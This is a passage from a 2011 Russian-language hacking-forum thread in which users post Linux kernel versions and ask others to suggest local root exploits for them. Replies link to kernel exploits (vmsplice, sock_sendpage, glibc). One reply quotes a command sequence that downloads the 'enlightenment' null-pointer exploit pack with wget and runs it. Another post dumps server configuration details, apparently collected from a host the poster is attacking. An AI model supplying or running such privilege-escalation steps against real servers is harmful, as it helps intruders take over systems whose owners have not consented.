HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #271  
Старый 05.05.2011, 20:24
Cybersteger
Познающий
Регистрация: 09.10.2009
Сообщений: 31
Провел на форуме:
287607

Репутация: 19
По умолчанию

Цитата:
Сообщение от SEWERN  
SEWERN said:
2.6.18-194.32.1.el5PAE #1 SMP Wed Jan 5 18:43:13 EST 2011 i686
Знаю что вышел локал рут (версия 2011 года), но не могу найти - если есть у кого то то помогите плз! Если есть у кого то акк тут _http://www.dl4hack.com/forum/local-root-exploits/1349-2-6-18-2011-root-exploit.html выложите плз сплойт
мне кажется что этот(http://www.dl4hack.com/forum/local-root-exploits/1349-2-6-18-2011-root-exploit.html) сплойт vmsplice под 2008 (

http://security-tr.blogspot.com/2011/01/2618-2011-local-root-exploit.html)

можешь попробовать

https: / /rdot.org/forum/showthread.php?t=817 под Glibc
 
Ответить с цитированием

  #272  
Старый 07.05.2011, 02:43
vasykas
Guest
Сообщений: n/a
Провел на форуме:
173402

Репутация: 37
По умолчанию

Вообщем не очень понимаю в кодинге НО я тут прочитал

в журнале XАкере февраль 2011 есть "Обход ограничений БЕЗОПАСТНОСТИ в ядре LINUX и в ( обход защиты выделения памяти ниже значения ,установленного в mmap_min_addr. уязвимость "Разыменование нулевого указателя")

кто нибудь сможет пояснить что нужно исправить в сплоите 2010 ( так понял что там (изменение адреса памяти, этой ветки. а можно ли на другую ветку изменить адрес . mmap )
 
Ответить с цитированием

  #273  
Старый 08.05.2011, 07:14
ReV0LVeR
Guest
Сообщений: n/a
Провел на форуме:
11980

Репутация: 1
По умолчанию

OS: Linux u-host.ru 2.6.9-100.ELsmp

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]Server security information

Server software
[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]Apache[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]2.0.52[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]Red Hat[/COLOR][COLOR="#007700"])

[/
COLOR][COLOR="#0000BB"]Loaded Apache modules[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]core[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]prefork[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]http_core[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]mod_so[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]mod_access[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]mod_auth[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]mod_auth_anon[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]mod_auth_digest[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]mod_include[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]mod_log_config[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]mod_env[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]mod_expires[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]mod_deflate[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]mod_headers[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]mod_usertrack[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]mod_setenvif[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]mod_mime[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]mod_dav[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]mod_status[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]mod_autoindex[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]mod_info[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]mod_dav_fs[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]mod_vhost_alias[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]mod_negotiation[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]mod_dir[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]mod_actions[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]mod_userdir[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]mod_alias[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]mod_rewrite[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]mod_cache[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]mod_suexec[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]mod_disk_cache[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]mod_file_cache[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]mod_mem_cache[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]mod_cgi[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]mod_fpcgid[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]mod_jk[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]mod_bw[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]mod_fcgid[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]mod_perl[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]mod_php5[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]mod_ssl

Disabled PHP Functions
[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]ini_restore

Open base dir
[/COLOR][COLOR="#007700"]: /var/[/COLOR][COLOR="#0000BB"]virtual[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]www[/COLOR][COLOR="#007700"]/

[/
COLOR][COLOR="#0000BB"]cURL support[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]enabled

Supported databases
[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]MySql[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]4.1.22[/COLOR][COLOR="#007700"]),[/COLOR][COLOR="#0000BB"]PostgreSQL

[/COLOR][/COLOR
Спасибо
 
Ответить с цитированием

  #274  
Старый 08.05.2011, 15:09
sevenup
Новичок
Регистрация: 04.10.2009
Сообщений: 5
Провел на форуме:
9361

Репутация: 0
По умолчанию

Цитата:
Сообщение от ReV0LVeR  
ReV0LVeR said:
OS: Linux u-host.ru 2.6.9-100.ELsmp
PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]Server security information

Server software
[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]Apache[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]2.0.52[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]Red Hat[/COLOR][COLOR="#007700"])

[/
COLOR][COLOR="#0000BB"]Loaded Apache modules[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]core[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]prefork[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]http_core[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]mod_so[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]mod_access[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]mod_auth[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]mod_auth_anon[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]mod_auth_digest[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]mod_include[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]mod_log_config[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]mod_env[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]mod_expires[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]mod_deflate[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]mod_headers[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]mod_usertrack[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]mod_setenvif[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]mod_mime[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]mod_dav[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]mod_status[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]mod_autoindex[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]mod_info[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]mod_dav_fs[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]mod_vhost_alias[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]mod_negotiation[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]mod_dir[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]mod_actions[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]mod_userdir[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]mod_alias[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]mod_rewrite[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]mod_cache[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]mod_suexec[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]mod_disk_cache[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]mod_file_cache[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]mod_mem_cache[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]mod_cgi[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]mod_fpcgid[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]mod_jk[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]mod_bw[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]mod_fcgid[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]mod_perl[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]mod_php5[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]mod_ssl

Disabled PHP Functions
[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]ini_restore

Open base dir
[/COLOR][COLOR="#007700"]: /var/[/COLOR][COLOR="#0000BB"]virtual[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]www[/COLOR][COLOR="#007700"]/

[/
COLOR][COLOR="#0000BB"]cURL support[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]enabled

Supported databases
[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]MySql[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]4.1.22[/COLOR][COLOR="#007700"]),[/COLOR][COLOR="#0000BB"]PostgreSQL

[/COLOR][/COLOR
Спасибо
для Linux 2.6.9 вот:

Цитата:
Сообщение от Expl0ited  
Expl0ited said:
1. wget http://www.grsecurity.net/~spender/enlightenment.tgz
2. tar -zxf enlightenment.tgz
3. cd enlightenment
4. ./run_null_exploits
5. ???
6. PROFIT!!!
 
Ответить с цитированием

  #275  
Старый 10.05.2011, 16:02
guezd
Guest
Сообщений: n/a
Провел на форуме:
59658

Репутация: 81
По умолчанию

Linux version 2.6.24-1gb-1 ?
 
Ответить с цитированием

  #276  
Старый 10.05.2011, 16:09
Tigger
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281

Репутация: 1177


Отправить сообщение для Tigger с помощью ICQ
По умолчанию

Цитата:
Сообщение от guezd  
guezd said:
Linux version 2.6.24-1gb-1 ?
Кидайте вы полный uname -a, без даты сборки ядра нет смысла постить 100500 плоентов.
 
Ответить с цитированием

  #277  
Старый 10.05.2011, 16:42
guezd
Guest
Сообщений: n/a
Провел на форуме:
59658

Репутация: 81
По умолчанию

Linux version 2.6.24-1gb-1 (root@l4.in-so[TR@$H]lve.ru) (gcc version 4.1.2 (Gentoo 4.1.2 p1.0.2)) #4 SMP Fri Feb 29 20:10:01 MSK 2008
 
Ответить с цитированием

  #278  
Старый 10.05.2011, 16:56
Tigger
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281

Репутация: 1177


Отправить сообщение для Tigger с помощью ICQ
По умолчанию

Пробуй sock_sendpage 3: http://www.exploit-db.com/exploits/9641/

full_neslon

Так же есть посмотри в сторону Glibc.
 
Ответить с цитированием

  #279  
Старый 11.05.2011, 15:58
M@rtein
Познающий
Регистрация: 09.08.2007
Сообщений: 58
Провел на форуме:
389103

Репутация: 15
По умолчанию

что посоветуете на:

2.4.21-57.ELsmp #1 SMP Wed Apr 23 01:38:02 EDT 2008 i686 ?
 
Ответить с цитированием

  #280  
Старый 11.05.2011, 16:49
plaeer
Guest
Сообщений: n/a
Провел на форуме:
34360

Репутация: 1
По умолчанию

Linux *** 2.6.18-238.1.1.1.el5 #1 SMP Mon Jan 24 10:43:48 NOVT 2011 x86_64

???
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ